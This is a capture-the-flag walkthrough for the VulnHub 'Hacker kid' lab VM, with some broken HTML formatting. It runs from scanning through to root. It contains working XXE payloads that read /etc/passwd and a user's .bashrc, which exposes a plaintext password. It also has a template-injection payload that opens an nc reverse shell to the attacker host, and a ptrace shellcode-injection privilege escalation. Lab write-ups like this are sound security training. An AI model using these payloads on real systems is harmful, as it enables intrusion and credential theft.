VlunHub Hacker kid: 1.0.1 Walkthrough

https://www.vulnhub.com/entry/hacker-kid-101,719/

Very good machine, learn some new stuff.

Scan ports, port 53 is interesting.

nmap -sV -sC -p- 192.168.33.144  -oN ports.log        
 ...
 PORT     STATE SERVICE VERSION
 53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
 | dns-nsid:
 |_  bind.version: 9.16.1-Ubuntu
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Notorious Kid : A Hacker
 9999/tcp open  http    Tornado httpd 6.1
 |_http-server-header: TornadoServer/6.1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

```bash
~ gobuster dir -u http://192.168.33.144 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
403,404,500 --wildcard -o 80.log
...

/images (Status: 301) [Size: 317] [--> http://192.168.33.144/images/]
/index.php (Status: 200) [Size: 3597]
/css (Status: 301) [Size: 314] [--> http://192.168.33.144/css/]
/form.html (Status: 200) [Size: 10219]
/app.html (Status: 200) [Size: 8048]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.144/javascript/]

Found hints in index.php source code.

```bash
 <div class="container py-5">
   <h1>Thanks</h1>

  TO DO: Use a GET parameter page_no  to view pages.
 --></code></pre>
<p>Fuzz index.php with page_no.</p>
<pre><code class="language-bash"> ~ seq 1 100 > dic.txt
 ~ wfuzz -u 'http://192.168.33.144/index.php?page_no=FUZZ'    -w dic.txt --hh 3654
 ...
 =====================================================================                                  
 000000021:   200        116 L    310 W      3849 Ch     "21"</code></pre>
<p>Get more info with page_no=21.</p>
<pre><code class="language-bash"> ~ curl 'http://192.168.33.144/index.php?page_no=21'
 <center>
         <font color="red">

 Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many homes...one such home..one such home for me : hackers.blackhat.local<br>
 <font color="red">
 </center></code></pre>
<p>Dig another domain name, write it into /etc/hosts.</p>
<pre><code class="language-bash">~ dig @192.168.33.144 hackers.blackhat.local                                                             ...
 ;; AUTHORITY SECTION:
 blackhat.local.         3600    IN      SOA     blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600
 ...</code></pre>
<p>Visit hackerkid.blackhat.local, use XXE (XML External Entity) Injection.</p>
<p>```bash
~ curl '<a href="http://hackerkid.blackhat.local/process.php&#039">http://hackerkid.blackhat.local/process.php&#039</a>;     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'file:///etc/passwd\'>
]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
...
saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
bind:x:126:133::/var/cache/bind:/usr/sbin/nologin</p>
<pre><code>
Read bachrc file with base64.

 ```bash
~ curl 'http://hackerkid.blackhat.local/process.php'     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'php://filter/convert.base64-encode/resource=/home/saket/.bashrc\'>]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
 ...
 Sorry, IyB+Ly5iYXNocmM6IGV4ZWN1dGVkIGJ5IGJhc2goMSkgZm9yIG5vbi1sb2dpbiBzaGVsbHMuCiMgc2VlIC91c3Ivc2hhcmUvZG9jL2Jhc...
 IFBhc3N3b3JkIGZvciBydW5uaW5nIHB5dGhvbiBhcHAKdXNlcm5hbWU9ImFkbWluIgpwYXNzd29yZD0iU2FrZXQhIyQlQCEhIgo= is not available !!!</code></pre>
<p>Decode base64. Get password of port 9999, but should login with name "saket".</p>
<pre><code class="language-bash"> #Setting Password for running python app
 username="admin"
 password="Saket!#$%@!!"</code></pre>
<p>Login port 9999.</p>
<p>image-20210906141418214.png</p>
<p>Input param "name", get output in webpage.</p>
<p>image-20210906141454486.png</p>
<p>Enter shell code, get reverse shell through nc, then spawn a new full shell.</p>
<p>```bash
{%import os%}{{os.system("nc 192.168.33.128 1234|/bin/bash|nc 192.168.33.128 2234")}}</p>
<pre><code>
Getcap enum.

 ```bash
saket@ubuntu:~$ /sbin/getcap / -r 2>/dev/null
 /sbin/getcap / -r 2>/dev/null
 /usr/bin/python2.7 = cap_sys_ptrace+ep
 /usr/bin/traceroute6.iputils = cap_net_raw+ep
 /usr/bin/ping = cap_net_raw+ep
 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
 /usr/bin/mtr-packet = cap_net_raw+ep
 ...</code></pre>
<blockquote>
<p>Reference: <a href="https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc">https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc</a></p>
</blockquote>
<p>Download the POC and upload to server.</p>
<pre><code class="language-bash"> wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py</code></pre>
<p>Choose a root process to be injected.</p>
<pre><code class="language-bash"> saket@ubuntu:~$ ps aux|grep root
 ...
 root         935  0.0  0.4 199776 19968 ?        Ss   12:54   0:00 /usr/sbin/apache2 -k start
 ...</code></pre>
<p>Run the POC, then check port.</p>
<p>```bash
saket@ubuntu:~$ python2.7 inject.py 935
python2.7 inject.py 935
Instruction Pointer: 0x7fd118b560daL
Injecting Shellcode at: 0x7fd118b560daL
Shellcode Injected!!
Final Instruction Pointer: 0x7fd118b560dcL
saket@ubuntu:~$ ss -tnlp
ss -tnlp
State     Recv-Q    Send-Q        Local Address:Port       Peer Address:Port    Process                 ...
LISTEN    0         0                   0.0.0.0:5600            0.0.0.0:*                                ...</p>
<pre><code>
Connect port 5600 and get root shell.

```bash
 ~ nc 192.168.33.144 5600              
 id
 uid=0(root) gid=0(root) groups=0(root)